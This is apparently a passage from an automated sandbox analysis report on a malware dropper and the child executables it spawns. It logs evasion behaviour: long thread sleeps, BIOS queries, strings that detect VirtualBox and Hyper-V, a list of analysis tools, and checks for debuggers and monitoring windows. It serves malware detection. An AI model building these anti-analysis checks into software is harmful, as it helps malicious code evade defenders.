                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5080Thread sleep count: 261 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5080Thread sleep time: -7830000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe TID: 8428Thread sleep time: -180000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe TID: 5228Thread sleep time: -180000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe TID: 1704Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe TID: 3748Thread sleep time: -30000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 5984Thread sleep count: 9736 > 30
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 5984Thread sleep time: -292080000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 5628Thread sleep time: -180000s >= -30000s
                              Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8172Thread sleep count: 164 > 30
                              Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8172Thread sleep time: -164000s >= -30000s
                              Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8172Thread sleep count: 40 > 30
                              Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8172Thread sleep time: -40000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 7208Thread sleep count: 1223 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 7208Thread sleep time: -2447223s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 6016Thread sleep count: 1231 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 6016Thread sleep time: -2463231s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 6696Thread sleep time: -32000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 5576Thread sleep count: 1167 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 5576Thread sleep time: -2335167s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 8104Thread sleep count: 1426 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 8104Thread sleep time: -2853426s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 7252Thread sleep count: 1197 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 7252Thread sleep time: -2395197s >= -30000s
                              Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7304Thread sleep count: 66 > 30
                              Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7304Thread sleep time: -66000s >= -30000s
                              Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7304Thread sleep count: 102 > 30
                              Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7304Thread sleep time: -102000s >= -30000s
                              Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 1988Thread sleep count: 49 > 30
                              Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 1988Thread sleep time: -49000s >= -30000s
                              Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 1988Thread sleep count: 106 > 30
                              Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 1988Thread sleep time: -106000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 4936Thread sleep count: 1194 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 4936Thread sleep time: -2389194s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 2180Thread sleep count: 1206 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 2180Thread sleep time: -2413206s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 6396Thread sleep time: -32000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 1900Thread sleep count: 1204 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 1900Thread sleep time: -2409204s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 2924Thread sleep count: 1224 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 2924Thread sleep time: -2449224s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 2008Thread sleep count: 1181 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 2008Thread sleep time: -2363181s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7104Thread sleep count: 72 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7104Thread sleep time: -144072s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7120Thread sleep count: 67 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7120Thread sleep time: -134067s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 3264Thread sleep time: -44000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 6428Thread sleep count: 70 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 6428Thread sleep time: -140070s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7896Thread sleep time: -300000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 6252Thread sleep count: 91 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 6252Thread sleep time: -182091s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7140Thread sleep count: 83 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7140Thread sleep time: -166083s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 8180Thread sleep count: 108 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 8180Thread sleep time: -216108s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 8072Thread sleep count: 102 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 8072Thread sleep time: -204102s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 7148Thread sleep count: 100 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 7148Thread sleep time: -200100s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 7016Thread sleep count: 105 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 7016Thread sleep time: -210105s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 5252Thread sleep count: 87 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 5252Thread sleep time: -174087s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 2696Thread sleep time: -44000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 2212Thread sleep count: 97 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 2212Thread sleep time: -194097s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 2256Thread sleep count: 103 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 2256Thread sleep time: -206103s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7064Thread sleep count: 35 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7064Thread sleep time: -70035s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7384Thread sleep time: -36000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 1880Thread sleep time: -30000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 6800Thread sleep time: -58029s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7176Thread sleep time: -58029s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7984Thread sleep count: 35 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7984Thread sleep time: -70035s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 1104Thread sleep count: 34 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 1104Thread sleep time: -68034s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7236Thread sleep count: 33 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7236Thread sleep time: -66033s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_003436A9 FindFirstFileExW,8_2_003436A9
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_0034375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_0034375A
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 10_2_003436A9 FindFirstFileExW,10_2_003436A9
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 10_2_0034375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,10_2_0034375A
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeThread delayed: delay time: 30000
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeThread delayed: delay time: 180000
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeFile opened: C:\Users\user
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeFile opened: C:\Users\user\Documents\desktop.ini
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeFile opened: C:\Users\user\AppData
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeFile opened: C:\Users\user\AppData\Local\Temp
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeFile opened: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeFile opened: C:\Users\user\AppData\Local
                              Source: file.exeBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                              Source: cc6f25572f.exe, 00000010.00000003.2843436830.000002B0C1B66000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWIh
                              Source: cd2469328d.exe, 0000000B.00000002.2792887182.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2792015764.0000000000CFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhc
                              Source: b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
                              Source: file.exe, 00000000.00000003.1725731744.000000000139F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: 7739517025.exe, 0000000D.00000002.2669175914.0000000001290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
                              Source: 5cda6c90d7.exe, 0000000C.00000002.2870509764.00000000017B9000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2659069201.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2773819917.00000000017B9000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2635795252.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2773960939.00000000017BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`v
                              Source: cd2469328d.exe, 0000000B.00000003.2792191733.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2792985078.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000002.2870509764.00000000017B9000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2659069201.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2773819917.00000000017B9000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2635795252.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2773960939.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2843436830.000002B0C1B66000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1AE5000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: file.exeBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                              Source: 5cda6c90d7.exe, 0000000C.00000002.2870509764.0000000001789000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                              Source: b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
                              Source: file.exe, 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmp, 5cda6c90d7.exe, 0000000C.00000002.2863553827.000000000113E000.00000040.00000001.01000000.0000000B.sdmp, b05c9e01f3.exe, 00000016.00000002.3061587262.000000000113D000.00000040.00000001.01000000.00000012.sdmp, 35f0a75b93.exe, 0000002B.00000000.3400109760.0000000000741000.00000080.00000001.01000000.0000001D.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                              Source: b6638733e4.exe, 00000013.00000003.2915551052.0000000006B91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlK'$
                              Source: b6638733e4.exe, 00000013.00000003.2912893712.0000000001972000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: cc6f25572f.exe, 00000011.00000002.2919171490.000001D669965000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893696860.000001D669962000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2874665665.000001D669960000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.4
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_1-10726
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeAPI call chain: ExitProcess graph end nodegraph_8-14447
                              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                              Anti Debugging

                              barindex
                              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeOpen window title or class name: regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeOpen window title or class name: gbdyllo
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeOpen window title or class name: procmon_window_class
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeOpen window title or class name: ollydbg
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeOpen window title or class name: filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: NTICE
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: SICE
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: SIWVID
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSystem information queried: KernelDebuggerInformation
                              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeProcess queried: DebugPort
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05120D04 rdtsc 0_2_05120D04
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_00335020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00335020
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088652B mov eax, dword ptr fs:[00000030h]0_2_0088652B
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088A302 mov eax, dword ptr fs:[00000030h]0_2_0088A302
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_009DA302 mov eax, dword ptr fs:[00000030h]1_2_009DA302
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_009D652B mov eax, dword ptr fs:[00000030h]1_2_009D652B
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_0035519E mov edi, dword ptr fs:[00000030h]8_2_0035519E
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_00331614 mov edi, dword ptr fs:[00000030h]8_2_00331614
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 10_2_00331614 mov edi, dword ptr fs:[00000030h]10_2_00331614
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_0033FE2C GetProcessHeap,8_2_0033FE2C
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_00335020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00335020
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_00335014 SetUnhandledExceptionFilter,8_2_00335014
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_00334C64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00334C64
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_0033B4B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0033B4B9
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 10_2_00335020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00335020
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 10_2_00335014 SetUnhandledExceptionFilter,10_2_00335014
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 10_2_00334C64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00334C64
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 10_2_0033B4B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0033B4B9
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeMemory protected: page guard

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: Yara matchFile source: Process Memory Space: 35f0a75b93.exe PID: 7748, type: MEMORYSTR
